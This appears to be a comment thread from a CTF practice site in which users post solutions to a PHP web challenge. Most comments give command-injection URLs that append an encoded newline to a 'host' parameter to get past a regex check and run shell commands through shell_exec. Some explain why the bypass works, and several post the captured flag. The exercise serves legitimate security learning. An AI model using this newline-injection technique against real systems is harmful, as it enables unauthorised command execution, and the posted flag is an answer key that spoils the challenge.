http://82.157.146.43:16777/query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
(1)http://82.157.146.43:13266/query.php?host=whois.verisign-grs.com%0A&query=ls (2) http://82.157.146.43:13266/query.php?host=whois.verisign-grs.com%0A&query=cat%20thisistheflagwithrandomstuf
host参数用%0a结尾,正则表达式/^[0-9a-zA-Z][0-9a-zA-Z\.-]+$/为什么能匹配成功?host字符串最后一位'\n'明明不在[0-9a-zA-Z\.-]范围内
query.php?host=whois.verisign-grs.com%0a&query=cat%20thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
/query.php?host=whois.verisign-grs.com%0a&query=ls /query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065}
/query.php?host=whois.verisign-grs.com%0a&query=cat%20thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
1.读php文件 2.分析出存在危险函数shell_exec 3.通过url编码换行绕过第一个参数host 4.第二个参数query可以输入rce。空格用url编码绕
在本题的正则匹配中,空格无法匹配$前的任何字符,所以%20是不可行的,if的条件都过不了;在whois.verisign-grs.com后加换行是可行的,不仅字符串本身可以过if,换行后相当于重新输命令,即query给出的参数直接执行命令
shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065} /query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
...
评论
admin9101 1月前
举报
http://82.157.146.43:16777/query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
MOCHAOLIN 2月前
举报
(1)http://82.157.146.43:13266/query.php?host=whois.verisign-grs.com%0A&query=ls (2) http://82.157.146.43:13266/query.php?host=whois.verisign-grs.com%0A&query=cat%20thisistheflagwithrandomstuf
wj834722134 3月前
举报
host参数用%0a结尾,正则表达式/^[0-9a-zA-Z][0-9a-zA-Z\.-]+$/为什么能匹配成功?host字符串最后一位'\n'明明不在[0-9a-zA-Z\.-]范围内
Tao23 5月前
举报
query.php?host=whois.verisign-grs.com%0a&query=cat%20thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
to5ny 6月前
举报
/query.php?host=whois.verisign-grs.com%0a&query=ls /query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
xzs297995 7月前
举报
shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065}
xiaoxiao972521 7月前
举报
/query.php?host=whois.verisign-grs.com%0a&query=cat%20thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
.⎛⎝•̀ω•́⎠⎞. 9月前
举报
1.读php文件 2.分析出存在危险函数shell_exec 3.通过url编码换行绕过第一个参数host 4.第二个参数query可以输入rce。空格用url编码绕
unknown237819 9月前
举报
在本题的正则匹配中,空格无法匹配$前的任何字符,所以%20是不可行的,if的条件都过不了;在whois.verisign-grs.com后加换行是可行的,不仅字符串本身可以过if,换行后相当于重新输命令,即query给出的参数直接执行命令
868954104 10月前
举报
shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065} /query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME